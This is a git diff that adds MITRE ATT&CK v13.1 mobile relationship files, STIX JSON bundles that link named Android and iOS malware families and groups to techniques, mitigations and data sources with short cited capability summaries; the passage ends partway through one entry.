b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f65087b4-adf2-4292-a711-7ae829e91397.json new file mode 100644 index 0000000000000000000000000000000000000000..5cb20cbbdfe49429093388cb635590aacd18725d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f65087b4-adf2-4292-a711-7ae829e91397.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--65c397c3-a137-4ce4-8a3c-6617782778a7", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f65087b4-adf2-4292-a711-7ae829e91397", + "type": "relationship", + "created": "2019-09-04T14:28:16.385Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2019-09-04T14:32:12.877Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can list applications installed on the device.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f857935b-653a-4b9a-a2dc-59c042059a39.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f857935b-653a-4b9a-a2dc-59c042059a39.json new file mode 100644 index 0000000000000000000000000000000000000000..a4d5a56becefa845b3ebf8eb7e42ec64e21ae33a --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--f857935b-653a-4b9a-a2dc-59c042059a39.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--fde8fc51-028c-40c7-aa6d-311ea515e146", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f857935b-653a-4b9a-a2dc-59c042059a39", + "created": "2023-03-20T15:56:04.673Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:56:04.673Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0", + "target_ref": "attack-pattern--986f80f7-ff0e-4f48-87bd-0394814bbce5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fa1da6db-da32-45d2-98a8-6bbe153166da.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fa1da6db-da32-45d2-98a8-6bbe153166da.json new file mode 100644 index 0000000000000000000000000000000000000000..b74478938522012b39bd25bf1e6459b0f9173968 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fa1da6db-da32-45d2-98a8-6bbe153166da.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--2c234dd2-e508-4ce1-8e2b-855e32648b22", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fa1da6db-da32-45d2-98a8-6bbe153166da", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-EnterpriseApps", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. Retrieved December 19, 2016.", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[AndroRAT](https://attack.mitre.org/software/S0292) tracks the device location.(Citation: Lookout-EnterpriseApps)", + "relationship_type": "uses", + "source_ref": "malware--a3dad2be-ce62-4440-953b-00fbce7aba93", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fb62afa9-d593-44f8-840d-bd5c595a1228.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fb62afa9-d593-44f8-840d-bd5c595a1228.json new file mode 100644 index 0000000000000000000000000000000000000000..9f586ac8093d3e019e0cd17887b765135dba5de3 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fb62afa9-d593-44f8-840d-bd5c595a1228.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--ab6e6b4c-3bdd-4945-b181-70711a89cdee", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--fb62afa9-d593-44f8-840d-bd5c595a1228", + "created": "2022-04-01T18:44:46.780Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "An EMM/MDM can use the Android `DevicePolicyManager.setPermittedAccessibilityServices` method to set an explicit list of applications that are allowed to use Android's accessibility features.", + "modified": "2022-04-01T18:44:46.780Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--dc01774a-d1c1-45fb-b506-0a5d1d6593d9", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fb6458b0-01b8-4c3f-b0f2-ef5d5bd9f6a8.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fb6458b0-01b8-4c3f-b0f2-ef5d5bd9f6a8.json new file mode 100644 index 0000000000000000000000000000000000000000..0dac61d5891cb8023ddc1a261b6a36b2b164ab23 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fb6458b0-01b8-4c3f-b0f2-ef5d5bd9f6a8.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--623e7d7a-0e79-41f8-b623-2ad79dfbfb77", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fb6458b0-01b8-4c3f-b0f2-ef5d5bd9f6a8", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T16:50:54.500Z", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) uploads SMS messages.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fbdbddd7-4980-4061-9192-24a887bc6bad.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fbdbddd7-4980-4061-9192-24a887bc6bad.json new file mode 100644 index 0000000000000000000000000000000000000000..768fcb499d8464e1f4e29f7677e75b53a166d5df --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fbdbddd7-4980-4061-9192-24a887bc6bad.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--d896f44d-f963-429e-844d-63f55e70367a", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fbdbddd7-4980-4061-9192-24a887bc6bad", + "type": "relationship", + "created": "2020-12-07T14:28:32.141Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020." + } + ], + "modified": "2020-12-07T14:28:32.141Z", + "description": "[Exobot](https://attack.mitre.org/software/S0522) can open a SOCKS proxy connection through the compromised device.(Citation: Threat Fabric Exobot)", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--5ca3c7ec-55b2-4587-9376-cf6c96f8047a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fc22c1f0-6888-43c0-ac7e-ee3d21feafc4.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fc22c1f0-6888-43c0-ac7e-ee3d21feafc4.json new file mode 100644 index 0000000000000000000000000000000000000000..c52c6a382fde874331eda0f83a9b52fc22292944 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fc22c1f0-6888-43c0-ac7e-ee3d21feafc4.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--66076b39-d882-4f6b-b30c-d8ea0c926789", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fc22c1f0-6888-43c0-ac7e-ee3d21feafc4", + "type": "relationship", + "created": "2019-09-03T19:45:48.485Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." + } + ], + "modified": "2019-09-11T13:25:19.117Z", + "description": " [Exodus](https://attack.mitre.org/software/S0405) Two can obtain a list of installed applications.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fc7639c8-0e52-4f6f-9cf3-7840be81ad55.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fc7639c8-0e52-4f6f-9cf3-7840be81ad55.json new file mode 100644 index 0000000000000000000000000000000000000000..61a782698f8fdf0fb5542865bbf09cc4ee01d8fb --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fc7639c8-0e52-4f6f-9cf3-7840be81ad55.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--c722d56b-273e-45a1-9927-8db11981434b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fc7639c8-0e52-4f6f-9cf3-7840be81ad55", + "created": "2023-03-03T16:23:56.031Z", + "revoked": false, + "external_references": [ + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T16:23:56.031Z", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) has collected the device UUID.(Citation: paloalto_yispecter_1015)", + "relationship_type": "uses", + "source_ref": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fc816ddc-199d-47b0-93af-c81305d0919f.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fc816ddc-199d-47b0-93af-c81305d0919f.json new file mode 100644 index 0000000000000000000000000000000000000000..b616821ea06d7f67fa60acb435815b84c863fbc3 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fc816ddc-199d-47b0-93af-c81305d0919f.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--646fe9cf-c28e-400b-b20c-763b60fbd736", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fc816ddc-199d-47b0-93af-c81305d0919f", + "type": "relationship", + "created": "2020-06-02T14:32:31.767Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Volexity Insomnia", + "url": "https://www.volexity.com/blog/2020/04/21/evil-eye-threat-actor-resurfaces-with-ios-exploit-and-updated-implant/", + "description": "A. Case, D. Lassalle, M. Meltzer, S. Koessel, et al.. (2020, April 21). Evil Eye Threat Actor Resurfaces with iOS Exploit and Updated Implant. Retrieved June 2, 2020." + } + ], + "modified": "2020-06-02T14:32:31.767Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) has utilized malicious JavaScript and iframes to exploit WebKit running on vulnerable iOS 12 devices.(Citation: Volexity Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fcb3a139-f644-45c9-8123-dfea0455143a.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fcb3a139-f644-45c9-8123-dfea0455143a.json new file mode 100644 index 0000000000000000000000000000000000000000..1cbc61bd9bdc92fa60032fb324aa6b9c70e16ea2 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fcb3a139-f644-45c9-8123-dfea0455143a.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--9c4855f4-cc30-457a-8d88-1cfbec5d716e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fcb3a139-f644-45c9-8123-dfea0455143a", + "type": "relationship", + "created": "2019-08-09T17:56:05.588Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.", + "source_name": "PaloAlto-SpyDealer" + } + ], + "modified": "2019-08-09T17:56:05.588Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) can record video and take photos via front and rear cameras.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fcc42341-ec3a-4e24-a374-46bed72d061f.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fcc42341-ec3a-4e24-a374-46bed72d061f.json new file mode 100644 index 0000000000000000000000000000000000000000..25a438a4d0f5a820d5e63bcfed29643f058a8423 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fcc42341-ec3a-4e24-a374-46bed72d061f.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--07225759-ee55-44eb-ab69-0505166450fd", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fcc42341-ec3a-4e24-a374-46bed72d061f", + "type": "relationship", + "created": "2021-10-01T14:42:49.191Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper \u2013 the unfriendly spy. Retrieved October 1, 2021." + } + ], + "modified": "2021-10-01T14:42:49.191Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can collect data from messaging applications, including WhatsApp, Viber, and Facebook.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fcda686d-0c3a-457a-a34d-6dcfb28f54bd.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fcda686d-0c3a-457a-a34d-6dcfb28f54bd.json new file mode 100644 index 0000000000000000000000000000000000000000..7d73e596f976a95aca3f0161ccd00ba14724b1de --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fcda686d-0c3a-457a-a34d-6dcfb28f54bd.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--36ae66eb-be6c-4571-997e-cedc679ec41c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fcda686d-0c3a-457a-a34d-6dcfb28f54bd", + "created": "2020-06-26T14:55:13.333Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cybereason EventBot", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020.", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:49:38.924Z", + "description": "[EventBot](https://attack.mitre.org/software/S0478) registers for the `BOOT_COMPLETED` intent to auto-start after the device boots.(Citation: Cybereason EventBot)", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fcdc2f1f-9787-4faa-86bf-2ed73f15a576.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fcdc2f1f-9787-4faa-86bf-2ed73f15a576.json new file mode 100644 index 0000000000000000000000000000000000000000..1f2862fbbd90430453832fe3f16d3b90615b7e0c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fcdc2f1f-9787-4faa-86bf-2ed73f15a576.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--4ad3d8e2-7915-4041-8143-7b023003fcd3", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fcdc2f1f-9787-4faa-86bf-2ed73f15a576", + "type": "relationship", + "created": "2020-09-14T14:13:45.294Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout eSurv", + "url": "https://blog.lookout.com/esurv-research", + "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-14T15:39:17.961Z", + "description": "[eSurv](https://attack.mitre.org/software/S0507)\u2019s Android version is distributed in three stages: the dropper, the second stage payload, and the third stage payload which is [Exodus](https://attack.mitre.org/software/S0405).(Citation: Lookout eSurv)", + "relationship_type": "uses", + "source_ref": "malware--680f680c-eef9-4f8a-b5f5-f451bf47e403", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fd5b3d4b-5d56-4d66-8b57-f858bc139901.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fd5b3d4b-5d56-4d66-8b57-f858bc139901.json new file mode 100644 index 0000000000000000000000000000000000000000..004f37871d31088d43011b753a7cec8e745621f1 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fd5b3d4b-5d56-4d66-8b57-f858bc139901.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--9dee057f-dd24-4c8e-8483-c6d2649ac9ab", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fd5b3d4b-5d56-4d66-8b57-f858bc139901", + "type": "relationship", + "created": "2020-04-24T17:46:31.607Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020." + } + ], + "modified": "2020-04-24T17:46:31.607Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) contains obfuscated function, class, and variable names, and encrypts its shared preferences using Java\u2019s `PBEWithMD5AndDES` algorithm.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fd6c7f4b-ce0f-4770-8487-786e41b63549.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fd6c7f4b-ce0f-4770-8487-786e41b63549.json new file mode 100644 index 0000000000000000000000000000000000000000..e482b91e831b2b39e846681c3e67ddbc3ddd4572 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fd6c7f4b-ce0f-4770-8487-786e41b63549.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--7d605ed3-843e-4296-bbb0-459f5cbf2158", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fd6c7f4b-ce0f-4770-8487-786e41b63549", + "created": "2023-03-20T18:24:56.396Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:24:56.396Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "target_ref": "attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fd8a4b6d-0e7b-4105-ad7b-576836be6394.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fd8a4b6d-0e7b-4105-ad7b-576836be6394.json new file mode 100644 index 0000000000000000000000000000000000000000..70966342f8a75b11395fc059dd0fdc51c49ce9a4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fd8a4b6d-0e7b-4105-ad7b-576836be6394.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--b9e4d8bb-2ee5-4328-9fdc-9783461a7e5c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fd8a4b6d-0e7b-4105-ad7b-576836be6394", + "created": "2021-02-08T16:36:20.639Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021.", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:07:15.780Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has region-locked their malicious applications during their Operation BULL campaign.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--e422b6fa-4739-46b9-992e-82f1b350c780", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fda8fe32-6121-4b81-9aa0-4e9596db88b1.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fda8fe32-6121-4b81-9aa0-4e9596db88b1.json new file mode 100644 index 0000000000000000000000000000000000000000..94c5f7c907511bd185a30c03c5f0f9efd5c4f52f --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--fda8fe32-6121-4b81-9aa0-4e9596db88b1.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--387e50ff-a8cc-417e-bfa4-2eed928d8518", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fda8fe32-6121-4b81-9aa0-4e9596db88b1", + "created": "2020-07-15T20:20:59.227Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:33:57.748Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can access SMS 